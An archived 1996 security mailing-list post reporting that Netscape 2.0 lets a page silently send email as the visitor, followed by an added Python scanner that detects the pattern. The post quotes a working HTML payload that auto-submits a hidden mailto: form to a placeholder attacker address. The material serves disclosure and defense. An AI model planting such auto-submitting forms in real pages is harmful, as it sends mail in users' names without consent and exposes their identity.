
List:       best-of-security
Subject:    BoS: Netscape2.0 sends mail to the world without authority
From:       Julian Assange <proff () suburbia ! net>
Date:       1996-03-12 3:05:23

Date: Mon, 11 Mar 1996 13:41:04 -0500
From: Jon Reeves <reeves@zk3.dec.com>
Subject: Yet another Trojan horse lurking in Netscape 2.0...

I noticed, while loading a web page, that there was a mailto: URL active
(using the "Easter Egg" Ctrl-Alt-T popup to see active URLs).  Sure enough,
after I cancelled that and examined the source, I saw something like this:

<body onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:nasty@secret.org?subject=gotcha">
<input type=hidden name="hi" value="there">
</form>

A quick test on my local machine shows that this will send a message to
nasty@secret.org with the subject gotcha and the body "hi=there".

This is insidious; it means that E-mail messages, purportedly from me (and
all traces will show they really are from me) can be sent anywhere, without
my knowledge, with contents that I do not approve.  Further, it means that I
can no longer count on browsing a site without my userid being disclosed.
Unlike Java, there is no way to disable this.  [Also been submitted to
Netscape.]
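
An added example, not part of the original message and not the poster's or Netscape's code: a heuristic scanner that flags the pattern reported above, a form whose action is a mailto: URL on a page that also calls submit() from script. The names MailtoFormScanner and scan are hypothetical, and both sample pages are constructed (the first from the snippet in the report).

```python
import re
from html.parser import HTMLParser

# Constructed samples: the reported page, and a benign user-submitted feedback form.
SAMPLE = '''<body onLoad="document.mailme.submit()">
<form method=post name="mailme" action="mailto:nasty@secret.org?subject=gotcha">
<input type=hidden name="hi" value="there">
</form>'''
BENIGN = '''<body><form method=post name="fb" action="mailto:webmaster@example.org">
<input type=text name="comment"><input type=submit></form></body>'''

SUBMIT_CALL = re.compile(r"\.submit\s*\(")

class MailtoFormScanner(HTMLParser):
    """Collects mailto: forms and every place script calls submit()."""
    def __init__(self):
        super().__init__()
        self.mailto_forms = []   # (form name, action) pairs
        self.triggers = []       # where a .submit( call was seen
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names (onLoad -> onload).
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("action", "").strip().lower().startswith("mailto:"):
            self.mailto_forms.append((a.get("name", ""), a["action"]))
        # Event-handler attributes (onload, onclick, ...) carry inline script.
        for k, v in a.items():
            if k.startswith("on") and SUBMIT_CALL.search(v):
                self.triggers.append(f"<{tag} {k}>")
        self._in_script = (tag == "script")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and SUBMIT_CALL.search(data):
            self.triggers.append("<script>")

def scan(html):
    """Return findings when a mailto: form coexists with a scripted submit()."""
    p = MailtoFormScanner()
    p.feed(html)
    p.close()
    if p.mailto_forms and p.triggers:
        return {"forms": p.mailto_forms, "triggers": p.triggers}
    return None
```

This is a static heuristic: it does not execute script, so a submit() call assembled at run time or loaded from another file would not be flagged.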
